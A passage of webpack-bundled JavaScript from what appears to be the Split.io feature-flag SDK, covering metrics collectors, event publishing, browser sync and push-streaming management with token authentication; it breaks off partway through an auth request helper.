Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

function fromLatenciesCollector(latenciesCollector) {
  var result = [];
  var metrics = latenciesCollector.toJSON();
  Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["d" /* forOwn */])(metrics, function (latencies, key) {
    result.push({
      name: key,
      latencies: latencies
    });
  });
  return result;
}
function fromCountersCollector(countersCollector) {
  var result = [];
  var metrics = countersCollector.toJSON();
  Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["d" /* forOwn */])(metrics, function (delta, key) {
    result.push({
      name: key,
      delta: delta
    });
  });
  return result;
}

/***/ }),
/* 2848 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return SegmentChangesCollector; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return SplitChangesCollector; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return MySegmentsCollector; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ClientCollector; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_inheritsLoose__ = __webpack_require__(696);


var ProducerMetricsCollector = /*#__PURE__*/function () {
  function ProducerMetricsCollector(storage) {
    this.storage = storage;
    this.latency = this.latency.bind(this);
    this.count = this.count.bind(this);
    this.countException = this.countException.bind(this);
  }

  var _proto = ProducerMetricsCollector.prototype;

  _proto.latency = function latency(ms) {
    this.storage.metrics.track(this.metricType + ".time", ms);
  };

  _proto.count = function count(status) {
    this.storage.count.track(this.metricType + ".status." + status);
  };

  _proto.countException = function countException() {
    this.storage.count.track(this.metricType + ".exception");
  };

  return ProducerMetricsCollector;
}();

var SegmentChangesCollector = /*#__PURE__*/function (_ProducerMetricsColle) {
  Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_inheritsLoose__["a" /* default */])(SegmentChangesCollector, _ProducerMetricsColle);

  function SegmentChangesCollector(storage) {
    var _this;

    _this = _ProducerMetricsColle.call(this, storage) || this;
    _this.metricType = 'segmentChangeFetcher';
    return _this;
  }

  return SegmentChangesCollector;
}(ProducerMetricsCollector);
var SplitChangesCollector = /*#__PURE__*/function (_ProducerMetricsColle2) {
  Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_inheritsLoose__["a" /* default */])(SplitChangesCollector, _ProducerMetricsColle2);

  function SplitChangesCollector(storage) {
    var _this2;

    _this2 = _ProducerMetricsColle2.call(this, storage) || this;
    _this2.metricType = 'splitChangeFetcher';
    return _this2;
  }

  return SplitChangesCollector;
}(ProducerMetricsCollector);
var MySegmentsCollector = /*#__PURE__*/function (_ProducerMetricsColle3) {
  Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_inheritsLoose__["a" /* default */])(MySegmentsCollector, _ProducerMetricsColle3);

  function MySegmentsCollector(storage) {
    var _this3;

    _this3 = _ProducerMetricsColle3.call(this, storage) || this;
    _this3.metricType = 'mySegmentsFetcher';
    return _this3;
  }

  return MySegmentsCollector;
}(ProducerMetricsCollector);
var ClientCollector = /*#__PURE__*/function () {
  function ClientCollector(storage) {
    this.storage = storage;
    this.ready = this.ready.bind(this);
    this.getTreatment = this.getTreatment.bind(this);
    this.getTreatments = this.getTreatments.bind(this);
    this.getTreatmentWithConfig = this.getTreatmentWithConfig.bind(this);
    this.getTreatmentsWithConfig = this.getTreatmentsWithConfig.bind(this);
  }

  var _proto2 = ClientCollector.prototype;

  _proto2.ready = function ready(ms) {
    this.storage.metrics.track('sdk.ready', ms);
  };

  _proto2.getTreatment = function getTreatment(ms) {
    this.storage.metrics.track('sdk.getTreatment', ms);
  };

  _proto2.getTreatments = function getTreatments(ms) {
    this.storage.metrics.track('sdk.getTreatments', ms);
  };

  _proto2.getTreatmentWithConfig = function getTreatmentWithConfig(ms) {
    this.storage.metrics.track('sdk.getTreatmentWithConfig', ms);
  };

  _proto2.getTreatmentsWithConfig = function getTreatmentsWithConfig(ms) {
    this.storage.metrics.track('sdk.getTreatmentsWithConfig', ms);
  };

  return ClientCollector;
}();

/***/ }),
/* 2849 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_timeTracker__ = __webpack_require__(278);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_fn_repeat__ = __webpack_require__(700);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__services_events__ = __webpack_require__(1289);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__services_events_bulk__ = __webpack_require__(1290);

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-events');





var EventsFactory = function EventsFactory(context) {
  var settings = context.get(context.constants.SETTINGS);
  var storage = context.get(context.constants.STORAGE);

  var pushEvents = function pushEvents() {
    if (storage.events.isEmpty()) return Promise.resolve();
    log.info("Pushing " + storage.events.state().length + " queued events.");
    var latencyTrackerStop = __WEBPACK_IMPORTED_MODULE_1__utils_timeTracker__["a" /* default */].start(__WEBPACK_IMPORTED_MODULE_1__utils_timeTracker__["a" /* default */].TaskNames.EVENTS_PUSH);
    var json = JSON.stringify(storage.events.toJSON());

    var wrapUpCb = function wrapUpCb() {
      return latencyTrackerStop();
    };

    storage.events.clear(); // we always clear the queue.

    return Object(__WEBPACK_IMPORTED_MODULE_3__services_events__["a" /* default */])(Object(__WEBPACK_IMPORTED_MODULE_4__services_events_bulk__["a" /* default */])(settings, {
      body: json
    })).then(wrapUpCb).catch(wrapUpCb);
  };

  var stopEventPublisherTimeout = false;
  var stopEventsPublisher = false;

  var startEventsPublisher = function startEventsPublisher() {
    return stopEventsPublisher = Object(__WEBPACK_IMPORTED_MODULE_2__utils_fn_repeat__["a" /* default */])(function (schedulePublisher) {
      return pushEvents().then(function () {
        return schedulePublisher();
      });
    }, settings.scheduler.eventsPushRate);
  };

  return {
    start: function start() {
      // On the browser there may be a wish to wait an specific amount of seconds before the first push.
      if (settings.startup.eventsFirstPushWindow > 0) {
        stopEventPublisherTimeout = setTimeout(startEventsPublisher, settings.startup.eventsFirstPushWindow);
      } else {
        startEventsPublisher();
      }
    },
    flush: function flush() {
      return pushEvents();
    },
    stop: function stop() {
      stopEventPublisherTimeout && clearTimeout(stopEventPublisherTimeout);
      stopEventsPublisher && stopEventsPublisher();
    },
    flushAndResetTimer: function flushAndResetTimer() {
      // Reset the timer and push the events.
      log.info('Flushing events and reseting timer.');
      stopEventsPublisher && stopEventsPublisher.reset();
      return pushEvents();
    }
  };
};

/* harmony default export */ __webpack_exports__["a"] = (EventsFactory);

/***/ }),
/* 2850 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = BrowserSyncManagerFactory;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__PushManager__ = __webpack_require__(2851);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__producer__ = __webpack_require__(2868);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__producer_browser_Partial__ = __webpack_require__(1293);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__utils_key_factory__ = __webpack_require__(492);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__utils_lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__constants__ = __webpack_require__(354);







var log = Object(__WEBPACK_IMPORTED_MODULE_5__utils_logger__["b" /* default */])('splitio-sync:sync-manager');
/**
 * Factory of sync manager for browser
 *
 * @param context main client context
 */

function BrowserSyncManagerFactory(mainContext) {
  // map of user keys to client contexts
  var contexts = {};
  var settings = mainContext.get(mainContext.constants.SETTINGS); // call `createInstance` before creating PushManager, since it is in charge of creating the full producer and adding it into the main context.

  var syncManager = createInstance(false, mainContext);
  var pushManager = settings.streamingEnabled ? Object(__WEBPACK_IMPORTED_MODULE_0__PushManager__["a" /* default */])(mainContext, contexts) : undefined;
  var mainProducer = mainContext.get(mainContext.constants.PRODUCER);

  function startPolling() {
    if (!mainProducer.isRunning()) {
      log.info('Streaming not available. Starting periodic fetch of data.');
      Object(__WEBPACK_IMPORTED_MODULE_4__utils_lang__["d" /* forOwn */])(contexts, function (context) {
        var producer = context.get(context.constants.PRODUCER);
        producer.start();
      });
    } else {
      log.info('Streaming couldn\'t connect. Continue periodic fetch of data.');
    }
  }

  function stopPollingAndSyncAll() {
    if (mainProducer.isRunning()) {
      log.info('PUSH (re)connected. Syncing and stopping periodic fetch of data.'); // if polling, stop

      Object(__WEBPACK_IMPORTED_MODULE_4__utils_lang__["d" /* forOwn */])(contexts, function (context) {
        var producer = context.get(context.constants.PRODUCER);
        producer.stop();
      });
    }

    syncAll();
  }

  function syncAll() {
    // fetch splits and segments
    var mainProducer = mainContext.get(mainContext.constants.PRODUCER);
    mainProducer.synchronizeSplits();
    Object(__WEBPACK_IMPORTED_MODULE_4__utils_lang__["d" /* forOwn */])(contexts, function (context) {
      var producer = context.get(context.constants.PRODUCER);
      producer.synchronizeMySegments();
    });
  }
  /**
   * Creates a SyncManager that handles the synchronization of clients (main and shared ones).
   * Internally, it creates the client producer, adds it into its context, and defines the `start` and `stop` methods that handle synchronization.
   *
   * @param {Object} context
   * @param {boolean} isSharedClient
   */


  function createInstance(isSharedClient, context) {
    var producer = isSharedClient ? Object(__WEBPACK_IMPORTED_MODULE_2__producer_browser_Partial__["a" /* default */])(context) : Object(__WEBPACK_IMPORTED_MODULE_1__producer__["a" /* default */])(context);
    var settings = context.get(context.constants.SETTINGS); // we need to stringify the user key (or matching key) in case it is not an string, to hash and pass as query param for authentication

    var userKey = Object(__WEBPACK_IMPORTED_MODULE_4__utils_lang__["q" /* toString */])(Object(__WEBPACK_IMPORTED_MODULE_3__utils_key_factory__["b" /* matching */])(settings.core.key));
    context.put(context.constants.PRODUCER, producer);
    if (contexts[userKey]) log.warn('A client with the same user key has already been created. Only the new instance will be properly synchronized.');
    contexts[userKey] = context;
    return {
      start: function start() {
        // start syncing
        if (pushManager) {
          if (!isSharedClient) {
            syncAll(); // initial syncAll (only when main client is created)

            pushManager.on(__WEBPACK_IMPORTED_MODULE_6__constants__["i" /* PUSH_SUBSYSTEM_UP */], stopPollingAndSyncAll);
            pushManager.on(__WEBPACK_IMPORTED_MODULE_6__constants__["h" /* PUSH_SUBSYSTEM_DOWN */], startPolling);
          } else {
            if (mainProducer.isRunning()) {
              // if doing polling, we must start the producer periodic fetch of data
              producer.start();
            } else {
              // if not doing polling, we must perform a `producer.synchronizeMySegments` for the initial fetch
              // of segments since `syncAll` was already executed when starting the main client
              producer.synchronizeMySegments();
            }
          }

          pushManager.startNewClient(userKey, context);
        } else {
          producer.start();
        }
      },
      stop: function stop() {
        var context = contexts[userKey];

        if (context) {
          // check in case `client.destroy()` has been invoked more than once for the same client
          delete contexts[userKey];

          if (pushManager) {
            pushManager.removeClient(userKey); // stop push if stoping main client

            if (!isSharedClient) pushManager.stop(); // We don't reconnect pushmanager when removing a shared client,
            // since it is more costly than continue listening the channel
          }

          if (producer.isRunning()) producer.stop();
        }
      }
    };
  } // For the main client we return a SyncManager with 3 methods: start, stop and shared. The last is used to instantiate "partial SyncManagers".


  syncManager.shared = createInstance.bind(null, true); // pushManager is exposed to close SSE connection in browser on 'unload' DOM event.

  syncManager.pushManager = pushManager;
  return syncManager;
}

/***/ }),
/* 2851 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = PushManagerFactory;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_events__ = __webpack_require__(275);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_events___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_events__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_object_assign__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__AuthClient__ = __webpack_require__(2852);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__pushRequirements__ = __webpack_require__(2856);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__SegmentUpdateWorker__ = __webpack_require__(2857);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__SplitUpdateWorker__ = __webpack_require__(2858);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__SSEClient__ = __webpack_require__(2859);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__SSEHandler__ = __webpack_require__(2860);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__utils_backoff__ = __webpack_require__(702);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__utils_jwt_hashUserKey__ = __webpack_require__(2863);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11__constants__ = __webpack_require__(354);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12__mySegmentsV2utils__ = __webpack_require__(2864);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13__utils_lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14__utils_lang_Sets__ = __webpack_require__(353);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_15__engine_engine_murmur3_murmur3_64__ = __webpack_require__(2866);
















var log = Object(__WEBPACK_IMPORTED_MODULE_10__utils_logger__["b" /* default */])('splitio-sync:push-manager'); // const UnboundedFetchRequest = 0;

var BoundedFetchRequest = 1;
var KeyList = 2;
var SegmentRemoval = 3;

function fallbackWarning(notificationType, e) {
  return "Fetching MySegments due to an error processing " + notificationType + " notification: " + e;
}
/**
 * Factory of the push mode manager.
 *
 * @param {Object} context context of main client.
 * @param {Object | undefined} clientContexts map of user keys to client contexts to handle sync of MySegments. undefined for node.
 */


function PushManagerFactory(context, clientContexts
/* undefined for node */
) {
  // No return a PushManager if PUSH mode is not supported.
  if (!Object(__WEBPACK_IMPORTED_MODULE_3__pushRequirements__["a" /* checkPushRequirements */])(log)) return;
  var pushEmitter = new __WEBPACK_IMPORTED_MODULE_0_events___default.a();

  var _context$get = context.get(context.constants.READINESS),
      splitsEventEmitter = _context$get.splits;

  var settings = context.get(context.constants.SETTINGS);
  var storage = context.get(context.constants.STORAGE);
  var sseClient = __WEBPACK_IMPORTED_MODULE_6__SSEClient__["a" /* default */].getInstance(settings, clientContexts ? false : true);
  var sseHandler = Object(__WEBPACK_IMPORTED_MODULE_7__SSEHandler__["a" /* default */])(pushEmitter);
  sseClient.setEventHandler(sseHandler); // map of hashes to user keys, to dispatch MY_SEGMENTS_UPDATE events to the corresponding MySegmentsUpdateWorker

  var userKeyHashes = {}; // map of user keys to their corresponding hash64 and MySegmentsUpdateWorker.
  // Hash64 is used to process MY_SEGMENTS_UPDATE_V2 events and dispatch actions to the corresponding worker.

  var clients = {}; // variable used on browser to reconnect only when a new client was added, saving some authentication and sse connections.

  var connectForNewClient = false; // flag that indicates if `disconnectPush` was called, either by the SyncManager (when the client is destroyed) or by a PUSH_NONRETRYABLE_ERROR error

  var disconnected;
  /** PushManager functions related to initialization */

  var connectPushRetryBackoff = new __WEBPACK_IMPORTED_MODULE_8__utils_backoff__["a" /* default */](connectPush, settings.scheduler.pushRetryBackoffBase);
  var timeoutIdTokenRefresh;
  var timeoutIdSseOpen;

  function scheduleTokenRefreshAndSse(authData) {
    // clear scheduled tasks if exist
    if (timeoutIdTokenRefresh) clearTimeout(timeoutIdTokenRefresh);
    if (timeoutIdSseOpen) clearTimeout(timeoutIdSseOpen); // Set token refresh 10 minutes before expirationTime - issuedAt

    var decodedToken = authData.decodedToken;
    var refreshTokenDelay = decodedToken.exp - decodedToken.iat - __WEBPACK_IMPORTED_MODULE_11__constants__["j" /* SECONDS_BEFORE_EXPIRATION */]; // Default connDelay of 60 secs

    var connDelay = typeof authData.connDelay === 'number' && authData.connDelay >= 0 ? authData.connDelay : 60;
    log.info("Refreshing streaming token in " + refreshTokenDelay + " seconds, and connecting streaming in " + connDelay + " seconds");
    timeoutIdTokenRefresh = setTimeout(connectPush, refreshTokenDelay * 1000);
    timeoutIdSseOpen = setTimeout(function () {
      // halt if disconnected
      if (disconnected) return;
      sseClient.open(authData);
    }, connDelay * 1000);
  }

  function connectPush() {
    // Halt connecting in case `stop/disconnectPush` has been called
    if (disconnected) return;
    log.info((disconnected === undefined ? 'Connecting' : 'Re-connecting') + " to push streaming.");
    disconnected = false;
    var userKeys = clientContexts ? Object.keys(clientContexts) : undefined;
    Object(__WEBPACK_IMPORTED_MODULE_2__AuthClient__["a" /* default */])(settings, userKeys).then(function (authData) {
      if (disconnected) return; // 'pushEnabled: false' is handled as a PUSH_NONRETRYABLE_ERROR instead of PUSH_SUBSYSTEM_DOWN, in order to
      // close the sseClient in case the org has been bloqued while the instance was connected to streaming

      if (!authData.pushEnabled) {
        log.info('Streaming is not available. Switching to polling mode.');
        pushEmitter.emit(__WEBPACK_IMPORTED_MODULE_11__constants__["f" /* PUSH_NONRETRYABLE_ERROR */]);
        return;
      } // don't open SSE connection if a new shared client was added, since it means that a new authentication is taking place


      if (userKeys && userKeys.length < Object.keys(clientContexts).length) return; // Schedule SSE connection and refresh token

      scheduleTokenRefreshAndSse(authData);
    }).catch(function (error) {
      if (disconnected) return;
      log.error("Failed to authenticate for streaming. Error: " + error.message + "."); // Handle 4XX HTTP errors: 401 (invalid API Key) or 400 (using incorrect API Key, i.e., client-side API Key on server-side)

      if (error.statusCode >= 400 && error.statusCode < 500) {
        pushEmitter.emit(__WEBPACK_IMPORTED_MODULE_11__constants__["f" /* PUSH_NONRETRYABLE_ERROR */]);
        return;
      } // Handle other HTTP and network errors as recoverable errors


      pushEmitter.emit(__WEBPACK_IMPORTED_MODULE_11__constants__["g" /* PUSH_RETRYABLE_ERROR */]);
    });
  } // close SSE connection and cancel scheduled tasks


  function disconnectPush() {
    // Halt disconnecting, just to avoid redundant logs if called multiple times
    if (disconnected) return;
    disconnected = true;
    sseClient.close();
    log.info('Disconnecting from push streaming.');
    if (timeoutIdTokenRefresh) clearTimeout(timeoutIdTokenRefresh);
    if (timeoutIdSseOpen) clearTimeout(timeoutIdSseOpen);
    connectPushRetryBackoff.reset();
    stopWorkers();
  }

  pushEmitter.on(__WEBPACK_IMPORTED_MODULE_11__constants__["h" /* PUSH_SUBSYSTEM_DOWN */], stopWorkers); // Only required when streaming connects after a PUSH_RETRYABLE_ERROR.
  // Otherwise it is unnecessary (e.g, STREAMING_RESUMED).

  pushEmitter.on(__WEBPACK_IMPORTED_MODULE_11__constants__["i" /* PUSH_SUBSYSTEM_UP */], function () {
    connectPushRetryBackoff.reset();
    stopWorkers();
  });
  /** Fallbacking without retry due to STREAMING_DISABLED control event, 'pushEnabled: false', and non-recoverable SSE and Authentication errors */

  pushEmitter.on(__WEBPACK_IMPORTED_MODULE_11__constants__["f" /* PUSH_NONRETRYABLE_ERROR */], function handleNonRetryableError() {
    // Note: `stopWorkers` is been called twice, but it is not harmful
    disconnectPush();
    pushEmitter.emit(__WEBPACK_IMPORTED_MODULE_11__constants__["h" /* PUSH_SUBSYSTEM_DOWN */]); // no harm if polling already
  });
  /** Fallbacking with retry due to recoverable SSE and Authentication errors */

  pushEmitter.on(__WEBPACK_IMPORTED_MODULE_11__constants__["g" /* PUSH_RETRYABLE_ERROR */], function handleRetryableError() {
    // HTTP or network error in SSE connection
    // SSE connection is closed to avoid repeated errors due to retries
    sseClient.close(); // retry streaming reconnect with backoff algorithm

    var delayInMillis = connectPushRetryBackoff.scheduleCall();
    log.info("Attempting to reconnect in " + delayInMillis / 1000 + " seconds.");
    pushEmitter.emit(__WEBPACK_IMPORTED_MODULE_11__constants__["h" /* PUSH_SUBSYSTEM_DOWN */]); // no harm if polling already
  });
  /** STREAMING_RESET notification. Unlike a PUSH_RETRYABLE_ERROR, it doesn't emit PUSH_SUBSYSTEM_DOWN to fallback polling */

  pushEmitter.on(__WEBPACK_IMPORTED_MODULE_11__constants__["b" /* ControlTypes */].STREAMING_RESET, function handleStreamingReset() {
    if (disconnected) return; // should never happen
    // Minimum required clean-up.
    // `disconnectPush` cannot be called because it sets `disconnected` and thus `connectPush` will not execute

    if (timeoutIdTokenRefresh) clearTimeout(timeoutIdTokenRefresh);
    connectPush();
  });
  /** Functions related to synchronization (Queues and Workers in the spec) */

  var producer = context.get(context.constants.PRODUCER);
  var splitUpdateWorker = new __WEBPACK_IMPORTED_MODULE_5__SplitUpdateWorker__["a" /* default */](storage.splits, producer, splitsEventEmitter);
  var segmentUpdateWorker; // used in Node
  // cancel scheduled fetch retries of Split, Segment, and MySegment Update Workers

  function stopWorkers() {
    splitUpdateWorker.backoff.reset();
    if (segmentUpdateWorker) segmentUpdateWorker.backoff.reset();
    Object(__WEBPACK_IMPORTED_MODULE_13__utils_lang__["d" /* forOwn */])(clients, function (_ref) {
      var worker = _ref.worker;
      return worker.backoff.reset();
    });
  }

  pushEmitter.on(__WEBPACK_IMPORTED_MODULE_11__constants__["l" /* SPLIT_KILL */], splitUpdateWorker.killSplit);
  pushEmitter.on(__WEBPACK_IMPORTED_MODULE_11__constants__["m" /* SPLIT_UPDATE */], splitUpdateWorker.put);

  if (clientContexts) {
    // browser
    pushEmitter.on(__WEBPACK_IMPORTED_MODULE_11__constants__["c" /* MY_SEGMENTS_UPDATE */], function handleMySegmentsUpdate(parsedData, channel) {
      var userKeyHash = channel.split('_')[2];
      var userKey = userKeyHashes[userKeyHash];

      if (userKey && clientContexts[userKey]) {
        // check context since it can be undefined if client has been destroyed
        var mySegmentSync = clientContexts[userKey].get(context.constants.MY_SEGMENTS_CHANGE_WORKER, true);
        mySegmentSync && mySegmentSync.put(parsedData.changeNumber, parsedData.includesPayload ? parsedData.segmentList ? parsedData.segmentList : [] : undefined);
      }
    });
    pushEmitter.on(__WEBPACK_IMPORTED_MODULE_11__constants__["d" /* MY_SEGMENTS_UPDATE_V2 */], function handleMySegmentsUpdate(parsedData) {
      switch (parsedData.u) {
        case BoundedFetchRequest:
          {
            var bitmap;

            try {
              bitmap = Object(__WEBPACK_IMPORTED_MODULE_12__mySegmentsV2utils__["b" /* parseBitmap */])(parsedData.d, parsedData.c);
            } catch (e) {
              log.warn(fallbackWarning('BoundedFetchRequest', e));
              break;
            }

            Object(__WEBPACK_IMPORTED_MODULE_13__utils_lang__["d" /* forOwn */])(clients, function (_ref2) {
              var hash64 = _ref2.hash64,
                  worker = _ref2.worker;

              if (Object(__WEBPACK_IMPORTED_MODULE_12__mySegmentsV2utils__["a" /* isInBitmap */])(bitmap, hash64.hex)) {
                worker.put(parsedData.changeNumber); // fetch mySegments
              }
            });
            return;
          }

        case KeyList:
          {
            var keyList, added, removed;

            try {
              keyList = Object(__WEBPACK_IMPORTED_MODULE_12__mySegmentsV2utils__["c" /* parseKeyList */])(parsedData.d, parsedData.c);
              added = new __WEBPACK_IMPORTED_MODULE_14__utils_lang_Sets__["a" /* _Set */](keyList.a);
              removed = new __WEBPACK_IMPORTED_MODULE_14__utils_lang_Sets__["a" /* _Set */](keyList.r);
            } catch (e) {
              log.warn(fallbackWarning('KeyList', e));
              break;
            }

            Object(__WEBPACK_IMPORTED_MODULE_13__utils_lang__["d" /* forOwn */])(clients, function (_ref3) {
              var hash64 = _ref3.hash64,
                  worker = _ref3.worker;

              if (added.has(hash64.dec)) {
                worker.put(parsedData.changeNumber, {
                  name: parsedData.segmentName,
                  add: true
                });
                return;
              }

              if (removed.has(hash64.dec)) {
                worker.put(parsedData.changeNumber, {
                  name: parsedData.segmentName,
                  add: false
                });
                return;
              }
            });
            return;
          }

        case SegmentRemoval:
          if (!parsedData.segmentName) {
            log.warn(fallbackWarning('SegmentRemoval', 'No segment name was provided'));
            break;
          }

          Object(__WEBPACK_IMPORTED_MODULE_13__utils_lang__["d" /* forOwn */])(clients, function (_ref4) {
            var worker = _ref4.worker;
            worker.put(parsedData.changeNumber, {
              name: parsedData.segmentName,
              add: false
            });
          });
          return;
      } // `UpdateStrategy.UnboundedFetchRequest` and fallbacks of other cases


      Object(__WEBPACK_IMPORTED_MODULE_13__utils_lang__["d" /* forOwn */])(clients, function (_ref5) {
        var worker = _ref5.worker;
        worker.put(parsedData.changeNumber);
      });
    });
  } else {
    // node
    segmentUpdateWorker = new __WEBPACK_IMPORTED_MODULE_4__SegmentUpdateWorker__["a" /* default */](storage.segments, producer);
    pushEmitter.on(__WEBPACK_IMPORTED_MODULE_11__constants__["k" /* SEGMENT_UPDATE */], segmentUpdateWorker.put);
  }

  return __WEBPACK_IMPORTED_MODULE_1_object_assign___default()( // Expose Event Emitter functionality and Event constants
  Object.create(pushEmitter), {
    // Expose functionality for starting and stoping push mode:
    stop: disconnectPush,
    // `handleNonRetryableError` cannot be used as `stop`, because it emits PUSH_SUBSYSTEM_DOWN event, which start polling.
    // used in node
    start: connectPush,
    // used in browser
    startNewClient: function startNewClient(userKey, context) {
      var hash = Object(__WEBPACK_IMPORTED_MODULE_9__utils_jwt_hashUserKey__["a" /* hashUserKey */])(userKey);
      var storage = context.get(context.constants.STORAGE);
      var producer = context.get(context.constants.PRODUCER);

      if (!userKeyHashes[hash]) {
        userKeyHashes[hash] = userKey;
        connectForNewClient = true; // we must reconnect on start, to listen the channel for the new user key
      }

      var mySegmentSync = new __WEBPACK_IMPORTED_MODULE_4__SegmentUpdateWorker__["a" /* default */](storage.segments, producer);
      clients[userKey] = {
        worker: mySegmentSync,
        hash64: Object(__WEBPACK_IMPORTED_MODULE_15__engine_engine_murmur3_murmur3_64__["a" /* hash64 */])(userKey)
      };
      context.put(context.constants.MY_SEGMENTS_CHANGE_WORKER, mySegmentSync); // Reconnects in case of a new client.
      // Run in next event-loop cycle to save authentication calls
      // in case the user is creating several clients in the current cycle.

      setTimeout(function checkForReconnect() {
        if (connectForNewClient) {
          connectForNewClient = false;
          connectPush();
        }
      }, 0);
    },
    removeClient: function removeClient(userKey) {
      var hash = Object(__WEBPACK_IMPORTED_MODULE_9__utils_jwt_hashUserKey__["a" /* hashUserKey */])(userKey);
      delete userKeyHashes[hash];
      delete clients[userKey];
    }
  });
}

/***/ }),
/* 2852 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = authenticate;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_object_assign__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__services_auth__ = __webpack_require__(2853);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__services_auth_auth__ = __webpack_require__(2854);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__utils_jwt__ = __webpack_require__(2855);




/**
 * Run authentication requests to Auth Server, and handle response decoding the JTW token.
 * Precondition:
 *
 * @param {Object} settings Split factory config, used to get authorizationKey and other params required by authRequest.
 * @param {string[] | undefined} userKeys set of user Keys to track MY_SEGMENTS_CHANGES. It is undefined for Node.
 * @throws {ReferenceError} if `atob` function is not defined
 */

function authenticate(settings, userKeys) {
  var authPromise = Object(__WEBPACK_IMPORTED_MODULE_1__services_auth__["a" /* default */])(Object(__WEBPACK_IMPORTED_MODULE_2__services_auth_auth__["a" /* default */])(settings, userKeys)); // errors handled by authService

  return authPromise // no need to handle json parsing errors as SplitError, since no user callbacks are executed after this promise is resolved
  .then(function (resp) {
    return resp.json();
  }).then(function (json) {
    if (json.token) {
      // empty token when `"pushEnabled": false`
      var decodedToken = Object(__WEBPACK_IMPORTED_MODULE_3__utils_jwt__["a" /* decodeJWTtoken */])(json.token);
      if (typeof decodedToken.iat !== 'number' || typeof decodedToken.exp !== 'number') throw new Error('token properties "issuedAt" (iat) or "expiration" (exp) are missing or invalid');
      var channels = JSON.parse(decodedToken['x-ably-capability']);
      return __WEBPACK_IMPORTED_MODULE_0_object_assign___default()({
        decodedToken: decodedToken,
        channels: channels
      }, json);
    }

    return json;
  });
}

/***/ }),
/* 2853 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__transport__ = __webpack_require__(279);

/* harmony default export */ __webpack_exports__["a"] = (__WEBPACK_IMPORTED_MODULE_0__transport__["a" /* default */]);

/***/ }),
/* 2854 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = GET;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__request__ = __webpack_require__(203);


function userKeyToQueryParam(userKey) {
  // no need to check availability of `encodeURIComponent`, since it is a function highly supported in browsers, node and other platforms.
  return 'users=' + encodeURIComponent(userKey);
}
/**
 *
 * @param {Object} settings Split factory config.
